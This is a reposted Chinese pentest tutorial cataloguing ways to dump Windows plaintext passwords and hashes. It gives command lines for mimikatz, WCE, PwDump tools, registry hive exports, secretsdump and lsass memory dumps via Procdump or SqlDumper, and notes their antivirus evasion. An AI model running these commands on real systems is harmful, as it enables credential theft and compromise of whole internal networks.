安基网 首页 安全 渗透测试 查看内容

教你多姿势抓取Windows明文或Hash

2019-2-27 14:31| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 渗透测试,可用于测试企业单位内网的安全性,而获取Windows的明文或Hash往往是整个渗透测试过程中重要的一环,一旦某台机器的密码在内网中是通用的,那么该内网的安全性将会非常糟糕。本期安仔课堂,ISEC实验室的李 ...

渗透测试,可用于测试企业单位内网的安全性,而获取Windows的明文或Hash往往是整个渗透测试过程中重要的一环,一旦某台机器的密码在内网中是通用的,那么该内网的安全性将会非常糟糕。

本期安仔课堂,ISEC实验室的李老师为大家介绍一些抓取Windows明文或Hash的方式。

一、mimikatz

mimikatz是一款轻量级的调试神器,功能非常强大,其中最常用的功能就是抓取明文或Hash。

用法:

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

图1

另外,需要注意的是,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。

图2

修改注册表命令:

图3

修改成功后,等用户下次再登录的时候,重新运行mimikatz,即可抓到明文密码,如需恢复原样,只需将上图REG_DWORD的值1改为0即可。

图4

二、Getpass

Getapss是由闪电小子根据mimikatz编译的一个工具,可以直接获取明文密码,直接运行Getpass.exe即可。

图5

三、Wce

Wce是一款Hash注入神器,不仅可以用于Hash注入,也可以直接获取明文或Hash。

抓明文:wce.exe -w

图6

抓Hash:wce.exe -l

图7

四、 Powershell

当目标系统存在powershell时,可直接一句powershell代码调用抓取,前提是目标可出外网,否则需要将ps1脚本放置内网之中。

抓明文:

图8

图9

抓Hash:

图10

图11

五、 Sam

1.使用注册表来离线导出Hash

reg save HKLM\SYSTEM system.hiv

reg save HKLM\SAM sam.hiv

reg save hklm\security security.hiv

导出后可以使用cain导入system.hiv、security.hiv获取缓存中的明文信息。

图12

或者导入sam.hiv和system.hiv的syskey获取密码Hash。

图13

除了cain,也可以使用mimikatz加载sam.hiv和sam.hiv来导出Hash。

用法:mimikatz.exe "lsadump::sam /system:system.hiv /sam:sam.hiv" exit

图14

或者使用impacket 套件中的 secretsdump.py 脚本去解密,也是可以的。

用法:python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL

图15

2.使用mimikatz在线导出sam的Hash

用法:mimikatz.exe "log res.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"

图16

六、PwDump7

Pwdump7可以在CMD下直接提取系统中用户的密码Hash,直接运行即可。

图17

七、 Quarks PwDump

Quarks PwDump 是一款开放源代码的Windows用户凭据提取工具,它可以抓取Windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。

用法:

导出本地用户Hash:

Quarks PwDump.exe --dump-hash-local

图18

配合Ntdsutil导出域用户Hash:

QuarksPwDump –dump-hash-domain –ntds-file c:\ntds_save.dit

图19

八、 Procdump + mimikatz

Procdump 是微软出品的一个小工具,具备一定的免杀功能。

用法:

1.生成dump文件

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

图20

2.mimikatz加载dump文件

mimikatz.exe"sekurlsa::minidumplsass.dmp""sekurlsa::logonPasswords full" "exit"

图21

九、SqlDumper + mimikatz

SqlDumper.exe是从SQL Server安装目录下提取出来的,功能和Procdump相似,并且也是微软出品的,体积远小于Procdump,也具备一定的免杀功能。SqlDumper.exe默认存放在C:\Program Files\Microsoft SQL Server\number\Shared,number代表SQL Server的版本,参考如下:

140 for SQL Server 2017

130 for SQL Server 2016

120 for SQL Server 2014

110 for SQL Server 2012

100 for SQL Server 2008

90 for SQL Server 2005

如果目标机器没有安装SQL Server,可以自己上传一个SqlDumper.exe。

用法:

1.查看lsass.exe 的ProcessID

tasklist /svc |findstr lsass.exe

图22

2.导出dump文件

Sqldumper.exe ProcessID 0 0x01100

图23

3.mimikatz加载dump文件

mimikatz.exe"sekurlsa::minidumpSQLDmpr0001.mdmp""sekurlsa::logonPasswords full""exit"

图24

成功导出明文或Hash破解后,一旦密码通用,将会威胁整个内网。因此,内网管理人员应尽量避免使用通用密码,并及时安装防护软件。



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6662510064764453390/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部